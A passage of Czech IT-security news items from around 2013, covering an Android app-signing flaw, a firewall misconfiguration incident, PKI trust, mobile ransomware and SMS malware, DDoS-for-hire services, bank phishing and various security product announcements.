zneužit výše uvedeným způsobem, není. Pokud však útočník přesvědčí uživatele, aby nebezpečnou aktualizaci pro aplikaci staženou z Google Play nainstaloval manuálně, celý program v mobilním zařízení bude nahrazen novou verzí a nadále již nebude komunikovat s Google Play. Googlu byla existence chyby oznámena v únoru a v březnu Bluebox informace o ní poskytl svým partnerům v Open Handset Alliance. Ti se musí nyní rozhodnout, jak se k ní postaví. Podle Blueboxu je zatím proti chybě chráněn pouze jeden chytrý telefon, a to Samsung Galaxy S4. Google na aktualizaci pro svá zařízení Nexus stále pracuje. Dostupnost aktualizací firmwaru pro tento problém se bude lišit podle jednotlivých zařízení, výrobců a operátorů. Otázkou v řadě případů bude, zda výrobci spolu s operátory vůbec vyhodnotí riziko jako dostatečné. „Ideální by bylo, pokud by všichni vydali aktualizaci, která tento bezpečnostní problém vyřeší, avšak z reality víme, že to takto bohužel nefunguje,“ uvedl Jeff Forristal z Blueboxu.
Manažer bezpečnosti: Zločinci jsou už uvnitř
Minulý pátek, když jsem dokončoval práci v kanceláři a připravoval se na víkend, jsem udělal děsivý objev. Začalo to varováním od systému IDS a skončilo zjištěním potíží na jednom z našich firemních firewallů – dost vážný problém.
Hacking | Incidenty
Jednou z věcí, na kterých jsem v poslední době pracoval, je budování nového síťového systému detekce narušení (IDS). Bylo to v mých plánech zabezpečení již nějakou dobu, ale omezení našeho nového rozpočtu projekt zbrzdilo. Nasazení našich senzorů IDS vyžadovalo kombinaci taktiky strašení (což nerad používám, ale zlé časy volají po zoufalých opatřeních), outsourcingu a staromódního postupu „udělej si sám“. Za posledních několik týdnů jsem postupně dosáhl pokroku. Senzory IDS jsou nainstalované a výsledky své činnosti hlásí systému SIEM (Security Incident and Event Management), který zjišťuje souvislosti mezi všemi záznamy v logech ze síťových zařízení, serverů, antivirových systémů a dalších technologií a generuje případná varování. Je to úžasný systém, a protože jeho realizace nebyla příliš drahá, poskytuje „za babku“ hodně muziky.
Tento pátek odpoledne jsem tedy procházel varování vygenerovaná novým systémem a našel jsem něco zvláštního: velký počet připojení vzdálené plochy z internetu do některých počítačů v naší interní síti. Kolega Mathias Thurman nedávno ve svém článku uváděl vzdálenou plochu jako „pravděpodobně nejrozšířenější metodu neoprávněného přístupu“. Nebylo to tedy něco, co bych očekával jako příchozí komunikaci z internetu. Zpočátku jsem si myslel, že to musí být falešný poplach nebo že to možná byla jen špatně navržená přístupová metoda pro nějakého vzdáleného dodavatele. Jinak řečeno jsem nevěřil, že by to mohlo ve skutečnosti probíhat tím nejhorším způsobem. Po bližším přezkoumání se ukázalo, že zmíněná připojení ke vzdálené ploše byla realizována z jiné země – z té, která nedávno plnila titulky novin v souvislosti se státem podporovanými síťovými útoky vůči některým významným firmám. A tato země se nyní připojuje k počítačům naší společnosti! Bylo to to poslední, co bych chtěl v pátek odpoledne zjistit! Nemohl jsem odejít, aniž jsem přesně věděl, co se děje. Zašel jsem tedy za správcem sítě. (V naší společnosti jsou firewally považovány za součást infrastruktury sítě a jako takové jsou spravovány síťovým týmem.) Řekl jsem mu, že potřebuji vidět konfiguraci zásad firewallu chránícího tyto počítače. Tuto informaci mi poskytl během pár sekund, a přestože jsem si myslel, že jsem připraven na nejhorší, zažil jsem obrovský šok. Konfigurace firewallu obsahovala několik pravidel typu ip-any-any. To pro několik počítačů v naší interní síti znamenalo, že se k nim mohl připojit každý počítač z internetu pomocí libovolného protokolu – jinými slovy, firewall byl otevřen zcela dokořán asi pro 16 počítačů v naší firemní síti. S uvedeným otevřeným pravidlem vlastně ani nelze mluvit o tom, že byste měli firewall, protože umožňuje stejné přenosy, jako by byly možné při nechráněném přímém připojení síťového kabelu do internetu. Pokud o firewallech něco víte, je vám asi jasné, jaký pocit hrůzy jsem zažil. Pokud ne, myslím, že vám to nedokážu dostatečně popsat, ale je to v podstatě moje nejhorší noční můra. Naše síť měla obrovskou díru, kterou využili nepřátelští útočníci. Bylo to jako mít spíž a najít otvor ve zdi, kterým vám tam chodí zvířátka ujídat a znečišťovat vaše zásoby jídla. Poslal jsem správce sítě okamžitě uzavřít díry ve firewallu a zahájil jsem audit konfigurací na všech našich firewallech. Samozřejmě že jsem audit konfigurací našich firewallů dělal pravidelně, ale s nedostatkem zaměstnanců a zdrojů jsem to nebyl schopen dělat dostatečně často. Uvedené problematické změny přitom vznikly poměrně nedávno. Myslím, že z této zkušenosti plyne mnoho ponaučení a jedno z nich je „nevěřit nikomu“.
Elektronický podpis, tak jak jej dnes známe a používáme, je založen na principech asymetrické kryptografie a na použití certifikátů. Důvěra v tyto certifikáty, a jejich prostřednictvím i důvěra v konkrétní elektronické podpisy, je odvozována od certifikačních autorit, které certifikáty vydávají. Certifikačních autorit je v praxi více a společně vytvářejí celou infrastrukturu veřejného klíče.
Zabezpečení
Připomeňme si z předchozích dílů tohoto seriálu, že dnes používaný elektronický podpis využívá existenci párových dat neboli soukromého a veřejného klíče. Pomocí soukromého se podepisuje, neboli vytváří samotný podpis, zatímco pomocí veřejného klíče se ověřuje platnost již vytvořeného podpisu. Přitom to, že oba klíče jsou vzájemně „do páru“ a fungují právě takto, je dáno samotnou podstatou tzv. asymetrické kryptografie. Ta ručí i za to, že soukromý klíč může zůstat skutečně soukromý a není nutné jej dávat z ruky, zatímco veřejný klíč lze dávat na potkání komukoli, kdo o něj bude mít zájem. Nebo jej dokonce proaktivně rozvěsit na každém rohu v on-line světě. Když už tedy máte v ruce nějaký veřejný klíč, s jehož pomocí si ověříte konkrétní podpis, získáte tím jistotu, že podpis mohl vytvořit jen držitel odpovídajícího soukromého klíče. Jenže pak nastává problém: jak poznáte, o koho jde? Tedy komu veřejný klíč skutečně patří? Nejjednodušší je to v případě, kdy vám veřejný klíč dá z ruky do ruky přímo dotyčný (či dotyčná) a prohlásí jej za svůj. Jenže co v ostatních případech, kdy veřejný klíč získáte nějak zprostředkovaně, a nikoli přímo? A co když má navíc patřit někomu, koho osobně neznáte? No ještě že máme certifikáty. Připomeňme si z minulého dílu, že certifikát je v podstatě jakási obálka, do které je vložen něčí veřejný klíč, dále lísteček s popisem identity držitele tohoto klíče – načež je obálka zalepena a podepsána tím, kdo ji naplnil (kdo certifikát vystavil). Fajn. Ale kdy a jak můžeme tomuto certifikátu věřit? Kdy se můžeme spolehnout na to, že jeho obsah odpovídá skutečnosti? Že veřejný klíč vložený do certifikátu skutečně patří tomu, kdo se vydává za jeho držitele?
Pavučina důvěry Jednou z možností je to, že certifikát si vystaví sám držitel veřejného klíče: vezme svůj veřejný klíč, k němu připíše údaje o své identitě, vše vloží do obálky a podepíše svým soukromým klíčem, který je „do páru“ s právě vloženým veřejným klíčem. Takovýto certifikát je pak označován jako certifikát s vlastním podpisem, anglicky self-signed. Právě proto, že si ho jeho držitel vydal a podepsal sám. Pokud vám takovýto certifikát s vlastním podpisem předá z ruky do ruky někdo, koho osobně znáte, není s tím problém. Víte, že tomuto certifikátu můžete důvěřovat. Jenže co když jej získáte od někoho jiného? Zde se dostáváme znovu ke stejnému problému jako se samotným klíčem. Ale teď už máme k dispozici i určité řešení. Představte si třeba, že se vám za tento nový certifikát zaručí někdo jiný, koho už dobře znáte. Že vám řekne, že tento certifikát skutečně patří tomu, kdo je v něm uveden jako jeho držitel. A na znamení toho dotyčný certifikát sám podepíše, neboli opatří svým vlastním podpisem. Pokud to takto udělá více lidí, kteří dotyčného znají a důvěřují jeho certifikátu, vzniká kolem tohoto certifikátu určitá „pavučina důvěry“. Ta může mít i více úrovní, když původní certifikát podepíšou – na znamení důvěry – i další lidé, kteří držitele certifikátu sice neznají, ale znají a důvěřují někomu, kdo ho zná a kdo certifikát již podepsal. Pavučina důvěry budovaná kolem původního certifikátu tak postupně houstne a bobtná. Výsledek lze připodobnit k jakési soustavě reputací. Čím více lidí svým podpisem vyjádří certifikátu důvěru, tím lépe. Důvěra v konkrétní certifikát je pak odvozována od míry a kvality jeho reputace neboli od hodnocení ostatními uživateli. Takto to funguje například u podpisů na bázi PGP (Pretty Good Privacy).
Výkupné chtějí zločinci už i v mobilech
Prý vůbec poprvé se objevil malware, v jehož rámci kyber zločinci chtějí peníze za odemčení chytrého telefonu s Androidem.
Mobilní
Symantec podle svých slov zaznamenal pravděpodobně vůbec první ransomware na mobilních zařízeních. Nový podvodný antivir ohrožuje uživatele mobilních zařízení se systémem Android. Aplikace uzamkne zařízení a požaduje výkupné za jeho odemčení.
Podvodné antiviry a ransomware jsou z osobních počítačů známé již řadu let a svým autorům vydělávají nemalé peníze. Autoři škodlivého kódu zjevně doufají, že stejný úspěch bude mít jejich hrozba i na mobilních zařízeních. Symantec detekoval hrozbu s názvem Android.Fakedefender.
Falešný antivirový software používá škodlivý kód, který záměrně zkresluje stav zabezpečení mobilního zařízení a pokouší se přesvědčit uživatele ke koupi plné verze tohoto softwaru, aby došlo k odstranění neexistující infekce.
Bližší informace o tomto typu škodlivého kódu najdete na webu Symanteku.
S nejnovější verzí Androidu klesá riziko zneužití
Poslední verze systému Android obsahuje pokročilé nástroje pro ochranu uživatelů. Problém je v jejím pomalém přijímání.
OS | Bezpečnost
Více než tři čtvrtiny malwaru pro Android tvoří škodlivé aplikace, které z uživatelských zařízení posílají prémiové SMS. Této hrozbě by se přitom dalo snadno předejít přechodem na poslední verzi 4.2 Jelly Bean, která obsahuje účinnou ochranu. Poslední verze Androidu však v současné době běží asi jen na 4 procentech zařízení s operačním systémem od Googlu. A to od jejího uvedení uplynulo již 6 měsíců. Podle dat společnosti Juniper Networks, dodavatele síťových řešení, vzrostl mezi březnem 2012 a březnem 2013 počet mobilní hrozeb o 614 %. Výzkumníci do března letošního roku identifikovali celkem 276 259 vzorků škodlivého softwaru. 92 % z nich bylo určeno pro operační systémy Android. Závěry výzkumníků z Juniper Neworks se shodují s informacemi jiných bezpečnostních firem. Rostoucí množství malwaru pro Android jde ruku v ruce s rostoucí popularitou této platformy. Většina škodlivého softwaru určeného pro Android má podobu aplikací, které své oběti obírají o peníze posíláním SMS na drahá telefonní čísla. Malware se obvykle tváří jako legitimní aplikace nebo je součástí pirátské verze nějakého programu. Výzkumníci odhadují, že útočníci si šířením tohoto typu malwaru přijdou v průměru na 10 dolarů za jediného uživatele. Pokud se uživatelé nechtějí stát jednou z obětí, pak by měli provést aktualizaci na poslední verzi systému Android. Součástí Androidu 4.2 je totiž nástroj, který rozpozná snahy o odeslání prémiových SMS a požádá uživatele o potvrzení operace. Touto funkcí jsou však chráněna pouze 4 % uživatelů. Jde o odhad založený na 14denním sběru dat z oficiálního obchodu Google Play. Nejpoužívanější verzí je podle výzkumníků z Juniperu Android 2.3.3 až 2.3.7. Systém s kódovým označením Gingerbread prý běží na 36,4 % všech zařízení s Androidem. Druhým nejpoužívanějším je Android 4.0.3 a 4.0.4 Ice Cream Sandwich s 25.5 procenty. K rostoucímu množství malwaru podle výzkumníků velmi přispívá především absence pravidelných aktualizací pro zařízení s Androidem. Poslední ochranné nástroje se tak k uživatelům dostanou se zpožděním nebo vůbec. Druhým nejčastějším typem hrozeb pro uživatele Androidu jsou podle Juniperu spywarové aplikace, prostřednictvím kterých útočníci získávají citlivá uživatelská data. Spyware tvoří 19 % všech škodlivých vzorků nashromážděných výzkumníky. Tato hrozba se podle výzkumníků stále častěji týká i firemních uživatelů a obecně se očekává, že „zapojení“ firem bude časem růst.
Kerio Control nabízí automatickou zálohu konfigurace
Novou verzi svého bezpečnostního UTM řešení Control představilo Kerio. Varianta 8.1 správcům poskytuje mj. snadný způsob zálohy konfigurace.
Zabezpečení
Nyní je nastavení serveru automaticky zálohováno na Samepage.io, platformu pro sociální spolupráci od Keria. Správci sítě se mohou zaregistrovat a získat uživatelský účet Samepage zdarma nebo použít svůj stávající účet a ukládat své nastavení každý den.
Kerio Control 8.1 je nástroj vhodný zejména pro organizace, které vyžadují rozsáhlou a stabilní ochranu sítě, analýzu síťové komunikace a informace a statistiky tříděné podle uživatele.
„Někteří dlouhodobí uživatelé zdokonalují nastavení svého produktu i několik let, aby vyhovoval jejich specifickým požadavkům. Nyní mohou být bez obav, protože veškerá nastavení jsou bezpečně ukládána na Samepage,” říká Chris Peluso, vice president of platform and business development ve společnosti Kerio Technologies.
Další funkce nové verze podle výrobce:
Řešení pro zachování připojení přes VPN tunel v případě výpadku spojení - VPN tunely zpravidla využívají jedno internetové připojení, a proto může snadno docházet k výpadku spojení. Díky této nové funkcionalitě lze k dosažení spolehlivějšího připojení zadat i více jmen nebo IP adres hostitele.
Podpora protokolu Simple Network Management Protocol (SNMP) – umožňuje získat přístup k důležitým informacím o stavu firewallu přes standardizované rozhraní protokolu SNMP. Na trhu existuje celá řada bezplatných nebo komerčních SNMP monitorovacích nástrojů jako je ConnectWise, Labtech, Kaseya či Zabbix.
Ochrana před hádáním hesel – vlastnost, která chrání proti hackerům tím, že při častých neúspěšných pokusech o přihlášení z jedné IP adresy dočasně znemožní přístup.
Cena serverové licence Control začíná na 5 300 Kč za 5 uživatelů. Za 520 Kč na uživatele lze v balíčcích po pěti dokoupit další licence. Ceny hardwarového zařízení včetně antiviru Sophos a doplňku Control Web Filter se pohybují od 19 700 Kč za Control Box 1110 pro 5 uživatelů.
Útoky AaaS: Attack as a Service
Různé ilegální služby zahrnují například útoky na zadanou počítačovou infrastrukturu či přímý pronájem nebo koupi botnetů.
Hacking | Počítačový útok
Cloudové služby přinášejí možnost zjednodušit vlastní infrastrukturu a výrazně snížit náklady na její provoz. Tato možnost oslovuje každého, kdo rozhoduje o nějaké společnosti, bez ohledu na její velikost a segment, ve kterém působí.
Platí to i pro svět kriminálních organizací. Některé z nich zcela komercionalizovaly své služby a nabízejí něco, co se zcela vážně dá označit za AaaS, Attack-as-a-Service. Jde různé ilegální služby, například útoky na zadanou počítačovou infrastrukturu či přímý pronájem a koupi botnetů, které „zákazník“ dostane k dispozici a může sám řídit například útoky DDoS na adresy dle vlastní volby.
Posledním příkladem tohoto trendu je čínská skupina, která spustila službu IM DDOS, kde si zájemci mohou logovat a objednávat útoky DDoS. Podle bezpečnostní firmy Damballa využívá IM DDoS poměrně velký botnet, který může být vážnou hrozbou pro každý cíl, snad s výjimkou těch největších a nejodolnějších provozovatelů.
Obsahu webu IM DDoS je k dispozici pouze v mandarinské čínštině, což samo o sobě značně limituje potenciální návštěvníky a zájemce. Provozovatelé (alespoň formálně) tvrdí, že mezi možné cíle patří pouze nelegitimní www servery, jako jsou různé hazardní služby. DDoS útoky na ilegální cíle nejsou zcela běžné, ale dochází k nim. Podle některých spekulací si například filmová studia či jiní majitelé mediálního obsahu občas objednávají útoky na weby, které nelegálně nabízejí jejich majetek. Je to možná metoda, jak přinejmenším dočasně znepřístupnit takovou nabídku.
Jak se zdá, tak pronájem hackera či crackera je poměrně levná záležitost – může to stát méně než večeře v lepší restauraci. Některé weby nabízejí získání e-mailových hesel do 48 hodin za 150 až 400 dolarů. IM DDOS svým zákazníkům vychází vstříc a řadu jednodušších služeb nabízí zdarma v rámci svých „prémiových produktů.“
Zmiňovaný provozovatel AaaS funguje jako regulérní organizace, komunikace se zákazníky zahrnuje SLA (service level agreement), předplatné, množstevní slevy a dokonce i linku technické podpory pro VIP zákazníky. Ta je ovšem anonymní a tajná, podpora většinou probíhá prostřednictvím čínské služby pro instantní komunikaci QQ..
Podle firmy Damballa malware, který buduje botnet používaný organizací IM DDOS, není ničím zvláštní a jeho komunikaci lze poměrně snadno detekovat. a tedy bránit jeho šíření. Nicméně současná velikost – hrubá síla – botnetu je již znepokojivá a může způsobovat problémy i v případě, že jeho další růst bude zastaven.
Trend AaaS představuje vážnou záležitost, která ukazuje, do jaké míry se kriminální podsvětí profesionalizuje a organizuje kolem moderních technologií. Stejně tak je třeba si uvědomit, že v případě Internetu již nejsou různé gangy hrozbou pouze pro své bezprostřední okolí, vliv i těch nejmenších se doslova internacionalizoval a pokud se jim podaří vyvolat explozivní růst nějakého botnetu, mohou ohrozit v podstatě kohokoli a kdekoli.
Útok na klienty českých bank stále pokračuje, varuje CSIRT Národní bezpečnostní tým
Počítačový útok | Incidenty
CSIRT varoval už minulý týden před spamovou kampaní, pomocí které se počítačoví piráti vydávají za zaměstnance tuzemských bank. Jak se ale nyní zdá, phishingové útoky pokračují i v tomto týdnu, upozornili v pondělí zástupci CSIRTu.
jsme obdrželi další vzorek phishingové zprávy, která cílí na zákazníky GE Money. Tato zpráva byla zaslána během dnešního dopoledne, lze tedy předpokládat, že phishingový útok z konce minulého týdne stále pokračuje,“ podotkl bezpečnostní analytik Pavel Bašta z CSIRTu.
V minulém týdnu se kromě zmiňovaného peněžního ústavu objevily také podvodné zprávy napodobující Českou spořitelnu a Raiffeisen Bank, jak Novinky informovaly.
Podvodná stránka napodobující GE Money Bank FOTO: CSIRT
Zprávy jsou zasílány na náhodné e-mailové adresy a na první pohled skutečně mohou budit dojem, že je jedná o zprávu banky. „V této zprávě se nachází odkaz ‚Přístup k účtu‘, který směřuje na stránky napodobující web banky,“ uvedl Bašta.
Podvodné zprávy jsou na rozdíl od jiných phishingových podvodů psány bez na první pohled viditelných pravopisných chyb. Uživatel ale přesto může odhalit falešnou stránku podle adresního řádku v internetovém prohlížeči. Z něj je na první pohled zřejmé, že se nenachází na legitimním webu banky.
Na podobné e-maily by klienti podle doporučení bank neměli vůbec reagovat.
Podvodná stránka napodobující Raiffeisen Bank
Eset vylepšuje NOD32 i Smart Security
Beta verze svých klíčových bezpečnostních řešení pro domácnosti představil Eset – jde o varianty Smart Security 7 a NOD32 Antivirus 7.
Zabezpečení
Nové produkty se podle výrobce vylepšenou ochranou před novým a dosud neznámým malwarem. Technologie Advanced Memory Scanner dokáže zastavit složitě šifrované hrozby, které byly vytvořeny tak, aby se vyhnuly detekci.
Vylepšené čištění pomáhá uživatelům odstranit komplexní rootkity, které bylo možné dosud odstranit pouze pomocí speciálních nástrojů.
„Počítačoví zločinci používají při tvorbě malwaru pokročilé techniky, s jejichž pomocí se snaží vyhnout detekci antivirových programů. Díky nové technologii, s níž přicházíme v betaverzi našich vlajkových produktů NOD32 Antivirus a Smart Security, to budou mít mnohem těžší," říká Palo Luka, technologický ředitel společnosti Eset.
Vlastnosti novinek podle výrobce:
Advanced Memory Scanner (Pokročilý skener paměti) zastavuje složitě šifrované hrozby, které byly vytvořeny tak, aby se vyhnuly detekci. Díky vylepšené schopnosti analyzovat rozšifrované soubory přímo v paměti se dokáže software účinně bránit novým a neznámým útokům škodlivého softwaru.
Vulnerability Shield (Štít zranitelností) - dostupný jen v Smart Security nabízí robustní ochranu při pokusech o zneužití zranitelnosti sítě.
Překvapení: Microsoft bude platit za zranitelnosti v Internet Exploreru
Microsoft na rozdíl od řady dalších dodavatelů softwaru tradičně odmítá platit za objevené bezpečnostní zranitelnosti. Nyní společnost tuto svoji zásadu ale porušila – na světě je dočasný program, který nabízí odměny za chyby nalezené v beta verzi Internet Exploreru 11.
Zranitelnosti
Microsoft program oficiálně spustí 26. 6., kdy bude stávající verze Internet Exploreru 11 pro Windows 8.1 představena na vývojářské konferenci Build. Za bezpečnostní zranitelnost je přitom firma ochotna vyplatit až 11 000 dolarů; je to v kontrastu s celkovým přístupem Microsoftu, který v oblasti IT zabezpečení sponzoruje spíše tvorbu obecných konceptů, nikoliv samotné hledání děr.
Každopádně ještě významnější než zájem o bezpečnost webového prohlížeče je rovněž oznámený program Mitigation Bypass Bounty, kde Microsoft nabízí za nové techniky umožňující obejít ochranné mechanismy Windows 8 až 100 000 dolarů; v tomto případě se ovšem v souladu se standardní politikou Microsoftu nejedná o klasickou“platbu za zranitelnosti“.
Bezpečnostní analytici jsou postupem Microsoftu překvapeni. Očekávání, že Microsoft začne vyplácet odměny za nalezené bezpečnostní díry, existovalo od roku 2010, kdy tento postup zvolil Google. Microsoft ovšem nehodlá mít takovou politiku jako standard. Snad se firma pro tento krok rozhodla pouze a právě u beta verze MSIE 11, s cílem maximálně odladit verzi finální (tj. RTM). Štědrá částka za nalezené chyby údajně Microsoft stejně vyjde levněji, než kdyby poté zranitelnosti opravoval (a urychleně testoval mezi měsíčními várkami záplat) za běhu.
Z pohledu samotných hledačů zranitelností není postoj výrobce softwaru nutně až tak podstatný, protože (zcela legálně) za objevené chyby platí např. HP Tipping Point v rámci programu Zero Day Initiative, VeriSign/iDefense, ale i další subjekty. Nicméně tyto firmy sdílí příslušné informace se zákazníky i vládními agenturami a jde jim o zabezpečení reálně používaných systémů – proto neodměňují zranitelnosti v beta verzích produktů.
Každopádně v tuto chvíli není jasné, zda Microsoft hodlá podobný přístup rozšířit i na své další produkty. Program pro MSIE 11 je svým trváním omezen na 1 měsíc.
Doporučení a hodnocení analytiků jsou nejednoznačná. Tipping Point i VeriSign Microsoft o nalezených chybách jinak stejně informují – a zdarma. Google loni za chyby v Chrome zaplatil 380 000 dolarů, letos už 213 000. Samozřejmě je to v obratech obou společností číslo zanedbatelné, související chvála nebo hana bezpečnostních expertů může mít větší cenu...
Avast Secure Line zabezpečuje Wi-Fi sítě
Avast Software oznámil, že uvedl na trh SecureLine, virtuální privátní síť (VPN), službu, která umožňuje zákazníkům šifrovat jejich komunikaci zatímco jsou připojeni do nezabezpečených WiFi sítí.
Zabezpečení
V celosvětovém průzkumu více jak 340 000 respondentů AVAST zjistil, že používání nezabezpečených WiFi sítí je obvyklý problém na celém světě.
“Vyvinuli jsme SecureLine vzhledem k rostoucí poptávce našich zákazníků,” řekl Vincent Steckler, generální ředitel Avast. “Polovina uživatelů PC v USA přistupuje k nezabezpečeným WiFi sítím a asi jedna třetina z nich provádí bezpečnostně citlivé operace – online nákupy, bankovní transakce, nebo cokoliv, co vyžaduje heslo – navzdory riziku, že hackeři mohou zachytit jejich důvěrné informace.”
Avast SecureLine používá zabezpečený protokol (SSL), šifrování a bezpečnostní klíče/ certifikáty k zabezpečení internetové komunikace v jinak nezabezpečených WiFi sítích. Když se uživatel připojí k nezabezpečené WiFi síti, obdrží zprávu, která ho upozorní na nebezpečí použití veřejných a nezabezpečených WiFi připojení, a zároveň jim nabídne volbu bezpečného připojení prostřednictvím VPN připojení s avast! SecureLine. Zákazníci jsou poté směřováni do uživatelského rozhraní, kde VPN může být kdykoliv proaktivně aktivována uživatelem.
“Integrovali jsme SecureLine do antiviru avast!, jak do verze zdarma, tak i do placcených verzí, takže stačí pouze jedno kliknutí a je možno ji začít používat,” řekl Ondřej Vlček, technický ředitel AVAST.
75 % malých a středních firem v ČR už využívá cloud
Z celkem 23 evropských zemí je Česká republika na 2. místě ve využívání cloudu mezi malými a středními podniky.
IT
Průzkum společnosti Ipsos Mori realizovaný pro Microsoft na konci 1. čtvrtletí letošního roku ve 23 evropských zemích mezi firmami do 25 zaměstnanců ukázal, že 75 % malých a středních firem v Česku již využívá cloudové služby. To je druhé nejvyšší zastoupení cloudových služeb v Evropě a je to 30 procentních bodů nad průměrem západoevropských zemí.
České firmy využívají v cloudu hlavně e-mail (71 %), zálohování dat (38 %), elektronickou výměnu dokumentů (29 %) a Voice over IP služby jako například Skype (29 %). Firmy se zajímají o cloud hlavně kvůli jeho vysoké bezpečnosti. Tu na cloudu oceňuje celých 85 % českých malých a středních podniků. 79 % českých firem cloud vnímá jako nástroj, jak zvýšit svoji online bezpečnost a celých 71 % v něm vidí nástroj, jak zajistit kontinuitu práce v případě přírodní katastrofy, jako jsou například povodně. České malé a střední firmy si však cení i uživatelské přívětivosti cloudu (71 % respondentů). Zajímavé je také srovnání pohledu českých malých a středních podniků na vliv cloudu na rovnováhu mezi pracovním a osobním životem. U těch firem, které cloud nevyužívají, se 45 % respondentů domnívá, že cloud tzv. work-life balance ovlivňuje pozitivně. U firem, které cloud už využívají, je však o jeho pozitivním dopadu na tuto oblast přesvědčeno celých 68 % respondentů.
Srovnání s Evropou Průzkum ukázal, že cloud je podstatně rozšířenější v zemích střední a východní Evropy než v západoevropských zemích. Ve Velké Británii využívá cloud jen 30 % malých a středních podniků (2. nejnižší číslo) a v Německu pouze 32 % (3. nejnižší příčka dělená s Dánskem). Nejvíce se cloud rozšířil naopak na Východě. První příčku získala Ukrajina (85 %), druhou Česká republika (75 %) a třetí jediná významnější západoevropská výjimka Francie (69 %). Tu pak v úzkém sledu následují Bulharsko, Řecko, Maďarsko a Turecko. České firmy vybočují také vysokou popularitou ukládání a zálohování dat v cloudu. Tu u nás využívá 38 % malých a středních firem, což je po Ukrajině se 43 % druhé nejvyšší číslo v Evropě. Pro srovnání – v sousedním Rakousku svá data do cloudu ukládá a zálohuje pouze 16 % malých a středních firem a v Německu dokonce jen 13 %. Firmy ze zemí, kde se cloud používá nejvíce, se o bezpečnost dat v cloudu také nejvíce obávají. Zatímco v průměru nad všemi 23 zeměmi vyslovilo o bezpečnost dat v cloudu obavy jen 62 % respondentů, v ČR to bylo 78 % a na Ukrajině, kde se cloud těší největšímu zájmu malých a středních podniků, 91 % všech dotázaných.
Fortinet slibuje ochranu před sofistikovanými ataky
Nový operační systém FortiOS 5 představila pro své firewally nové generace firma Fortinet. Přináší snažší administraci či ochranu před pokročilými ataky typu APT či ATA.
Ochrany
Uživatelé mohou například volit mezi řadou možností konfigurace jediným kliknutím myši. Tímto způsobem lze nastavovat vysokorychlostní firewall, firewall NGFW, ochranu před pokročilými hrozbami, filtrování webu, jednotné řízení hrozeb (UTM) a další funkce.
Administrátoři také mohou snadno získávat přehled o fungování firemní sítě -- k dispozici je pohled v reálném čase i zobrazení historických dat. Tato funkce umožňuje např. pohled na síť podle používaných aplikací a zařízení nebo činnosti uživatelů.
Pro podrobnou analýzu lze ze systému extrahovat informace, jako jsou IP adresy (včetně jejich geografického umístění), čísla portů, typy relací nebo míra využívání sítě. Události a hrozby lze propojit s konkrétními bezpečnostními riziky a například zabránit přístupu k síti určitým zařízením nebo IP adresám. K dispozici je i reputační funkce.
Posílily se i bezpečnostní nástroje pro ochranu před pokročilými hrozbami, které kombinují více vektorů útoku. Nová služba FortiGuard Advanced Threat Protection Service prý dokáže chránit před zranitelnostmi zero day, dosud neznámým malwarem, phishingovými e-maily i útoky na hesla.
K dispozici je black list pro botnety i sand box (oddělení potenciálně rizikových procesů od zbytku sítě) založený na technologiích cloudu.
Možné konfigurace zahrnují např. vysoce výkonný firewall včetně VPN (virtuální privátní sítě), pokročilý firewall (NGFW; kromě samotného firewallu nabízí také prevenci vniknutí a řízení aplikací), ATP (ochrana před pokročilými hrozbami včetně ochrany koncových bodů), filtrování webu (včetně explicitní brány proxy), kombinaci NGFW/ATA a UTM.
Jednotné řízení hrozeb obsahuje všechny výše uvedené funkce a navíc nabízí filtrování e-mailu, prevenci ztráty dat a skenování zranitelností.
Několik samozřejmostí v boji proti útokům DDoS
Nejsou to jen banky, které nechtějí podlehnout útokům DDoS (distribuované odmítnutí služby). Útočníci jsou zákeřnější a lépe vybavení a je třeba se adekvátně připravovat.
Počítačové útoky | Incidenty
K útokům DDoS dochází v poslední době stále častěji. Jejich obětí jsou nejen zahraniční obři jako Bank of America, ale stále menší regionální cíle, na které prostě došla řada. Není za tím třeba hledat nějakou politickou či komerční motivaci, občas se prostě ocitly v hledáčku někoho, kdo má zrovna pod kontrolou nástroje vhodné pro podobný útok.
Vyvolává to zvýšený zájem o bezpečnostní stránku vlastního IT, ale řada manažerů zodpovědných za bezpečnost se na své pozici nacházejí poprvé, pokud rovnou taková pozice nebyla vytvořena docela nedávno, a zdaleka nemá otěže svého IT pevnou v rukou.
Zamlčování oslabuje obranné linie společnosti Sdílení informací o proběhlých útocích by mělo být samozřejmostí. Útočníci si své poznatky často vyměňují a obránci by tak měli činit také. Minulým obětím to může pomoci jen při vylepšování jejich zabezpečení, ale naprosto klíčové je to pro oběti probíhajícího útoku, které mohou výrazně lépe reagovat, pokud budou včas vědět, jak útok bude probíhat, z jakých adres IP atd.
Připravte se na nebytnost reakcí v reálném čase Opět, jak se ukázalo i během útoků na cíle v České republice, je třeba očekávat nejen jejich příchod z několika stran, různými metodami, ale také to, že se jejich taktika bude průběžně měnit. Pachatelé mohou sledovat, jak cíl reaguje, a volit, jak dále postupovat.
Monitorujte své aplikace Útoky na specifické aplikace nemusí mít tak velký objem paketů, jsou lépe cílené a mnohem méně nápadné. Je vhodné, aby bezpečností nástroje ve vlastním datacentru zvládaly hlubokou inspekci paketů a poskytovaly přehled o tom, co se děje.
Obrana perimetru nestačí Zkušenosti ukazují, že spoléhat se na klasické bezpečnostní prvky, které se nacházejí ve společnosti, nestačí. Firewally, systémy na detekci průniků, vyvažovače zátěže nebyly v minulosti schopny útoky zablokovat. Podobná zařízení jsou zranitelná stejně jako servery, které mají ochraňovat. Je třeba jít proti proudu dat a útok odrážet u poskytovatele služby či konektivity, který je ke zdroji útoku blíže. Pokud máte gigabitové připojení a snažíte se sami odrazit 10gigabitový útok, jsou vaše šance mizivé.
Připravte se na sekundární útok… Bez ohledu na nepříjemnosti a viditelnost nemusí být ve skutečnosti útok DDoS vůbec podstatný. Může jít pouze o maskovací manévr, který má odvrátit pozornost od skutečného útoku, který nemá za úkol přímo škodit, ale sbírat cenná data.
A na závěr: vyplatí se obávat se. Nedávné útoky dokazují, že cílem a obětí se může stát skutečně jakákoli společnost, malá či velká.
Router, který ochrání český internet, vyvíjí CZ.NIC
Bezpečný domácí router hodlá vyvinout český CZ.NIC. Podle jeho představitelů jde o součást většího projektu zaměřeného na zlepšení bezpečnosti v českém síťovém prostředí, a to pomocí aktivního monitoringu a analýzy síťového provozu.
Výzkum
Zmíněný router bude v rámci tohoto projektu plnit roli síťové sondy a zároveň aktivního prvku v ochraně koncových uživatelů, říká Bedřich Košata, vedoucí projektu a vývojového týmu.
Vzhledem k tomu, že většina domácích sítí je připojená k síti svého poskytovatele přes jeden přístupový bod, kterým je domácí router, a často používá NAT, který schovává celou domácí síť za jedinou IP adresu, vedou první útoky v podstatě vždy právě na domácí router.
